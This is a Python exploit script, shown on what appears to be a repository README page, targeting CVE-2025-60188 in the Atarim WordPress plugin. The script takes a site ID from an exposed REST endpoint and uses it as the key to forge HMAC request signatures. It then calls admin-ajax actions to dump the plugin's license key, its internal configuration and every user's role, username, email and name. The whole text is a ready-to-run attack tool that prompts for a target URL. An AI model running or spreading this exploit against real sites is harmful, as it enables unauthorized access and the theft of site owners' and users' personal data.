README.md
Rendering markdown...
# ==============================================================================
# Author: m4sh_wacker
# Description: Exploits CVE-2025-60188 (Atarim Plugin) to bypass authentication via HMAC forgery and exfiltrate sensitive PII & System Config.
# ==============================================================================
import requests
import hashlib
import hmac
import json
import sys
import urllib3
import re
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def print_banner():
banner = r"""
____ __ _ __ __
/ __ \________ ____ _____/ / / | / /__ / /_
/ / / / ___/ _ \/ __ \/ __ / / |/ / _ \/ __/
/ /_/ / / / __/ /_/ / /_/ / / /| / __/ /_
/_____/_/ \___/\__,_/\__,_/ /_/ |_/\___/\__/
Author: m4sh_wacker
"""
print(banner)
class Colors:
HEADER = '\033[95m'
BLUE = '\033[94m'
CYAN = '\033[96m'
GREEN = '\033[92m'
FAIL = '\033[91m'
WARNING = '\033[93m'
ENDC = '\033[0m'
BOLD = '\033[1m'
class AtarimUltimateExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.site_id = None
self.ajax_url = f"{self.target}/wp-admin/admin-ajax.php"
self.rest_url = f"{self.target}/wp-json/atarim/v1/db/vc"
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*'
}
def step_1_steal_id(self):
print(f"{Colors.BLUE}[*] Connecting to target to extract Site ID...{Colors.ENDC}")
try:
r = requests.get(self.rest_url, headers=self.headers, verify=False, timeout=15)
match = re.search(r'"wpf_site_id":"(\d+)"', r.text)
if match:
self.site_id = match.group(1)
print(f"{Colors.GREEN}[+] TARGET INFECTED! Site ID Found: {self.site_id}{Colors.ENDC}\n")
return True
print(f"{Colors.FAIL}[-] Exploit Failed. Site ID not found in response.{Colors.ENDC}")
return False
except Exception as e:
print(f"{Colors.FAIL}[-] Connection Error: {e}{Colors.ENDC}")
return False
def send_signed_request(self, action_name):
if not self.site_id: return None
reference = "sys_admin_check"
signature = hmac.new(
key=self.site_id.encode('utf-8'),
msg=reference.encode('utf-8'),
digestmod=hashlib.sha256
).hexdigest()
auth_headers = self.headers.copy()
auth_headers.update({
'Request-Reference': reference,
'Request-Signature': signature
})
try:
r = requests.post(
self.ajax_url,
data={'action': action_name},
headers=auth_headers,
verify=False,
timeout=20
)
if r.status_code == 200:
try:
return r.json()
except:
return None
return None
except:
return None
def run_exploit(self):
if not self.step_1_steal_id():
return
print(f"{Colors.HEADER}{'='*100}")
print(f" 1. SYSTEM INTELLIGENCE (CONFIG & KEYS)")
print(f"{'='*100}{Colors.ENDC}")
details = self.send_signed_request('wpf_website_details')
if details and isinstance(details, dict):
print(f" {Colors.CYAN}Target URL:{Colors.ENDC} {details.get('url', 'N/A')}")
print(f" {Colors.CYAN}Site Name:{Colors.ENDC} {details.get('name', 'N/A')}")
license_key = details.get('wpf_license_key')
if license_key and str(license_key).lower() != 'false':
print(f" {Colors.CYAN}License Key:{Colors.ENDC} {Colors.FAIL}{license_key} (LEAKED!){Colors.ENDC}")
else:
print(f" {Colors.CYAN}License Key:{Colors.ENDC} {Colors.WARNING}Not Found / Free Version{Colors.ENDC}")
print(f"\n {Colors.BOLD}[Internal Configurations]{Colors.ENDC}")
settings = details.get('settings', [])
for s in settings:
k = s.get('name', '').replace('wpf_', '').replace('_', ' ').title()
v = str(s.get('value', ''))
if '@' in v or 'admin' in v.lower():
v = f"{Colors.GREEN}{v}{Colors.ENDC}"
print(f" - {k:<30} : {v}")
else:
print(f"{Colors.FAIL} [-] Failed to dump system config.{Colors.ENDC}")
time.sleep(1)
print(f"\n{Colors.HEADER}{'='*100}")
print(f" 2. COMPROMISED ACCOUNTS (FULL PII DUMP)")
print(f"{'='*100}{Colors.ENDC}")
users = self.send_signed_request('wpf_website_users')
if users and isinstance(users, list):
header = "{:<5} | {:<15} | {:<20} | {:<30} | {:<15} | {:<15}".format(
"ID", "ROLE", "USERNAME", "EMAIL", "FIRST NAME", "LAST NAME"
)
print(f"{Colors.BOLD}{header}{Colors.ENDC}")
print("-" * 110)
for u in users:
uid = str(u.get('wpf_id', '-'))
role = u.get('role', 'none')
uname = u.get('wpf_name', 'unknown')
email = u.get('wpf_email', 'unknown')
fname = u.get('first_name', '')
lname = u.get('last_name', '')
c_start = ""
c_end = ""
if 'admin' in role.lower():
c_start = Colors.FAIL
c_end = Colors.ENDC
print(f"{c_start}{uid:<5} | {role:<15} | {uname:<20} | {email:<30} | {fname:<15} | {lname:<15}{c_end}")
known_cols = [
'wpf_id', 'role', 'wpf_name', 'wpf_email',
'first_name', 'last_name', 'is_admin',
'wpf_display_name', 'wpf_user_avatar'
]
extras = {k: v for k, v in u.items() if k not in known_cols and v}
if extras:
for k, v in extras.items():
print(f" {Colors.WARNING}-> {k}: {v}{Colors.ENDC}")
print(f"\n{Colors.GREEN}[+] Total Users Extracted: {len(users)}{Colors.ENDC}")
else:
print(f"{Colors.FAIL} [-] No users found or Access Denied.{Colors.ENDC}")
print(f"\n{Colors.HEADER}{'='*100}")
print(f" EXPLOIT FINISHED")
print(f"{'='*100}{Colors.ENDC}")
if __name__ == "__main__":
print_banner()
target_site = input(f"{Colors.BOLD}Enter Target Site URL (e.g., https://example.com): {Colors.ENDC}").strip()
if len(sys.argv) > 1:
target_site = sys.argv[1]
exploit = AtarimUltimateExploit(target_site)
exploit.run_exploit()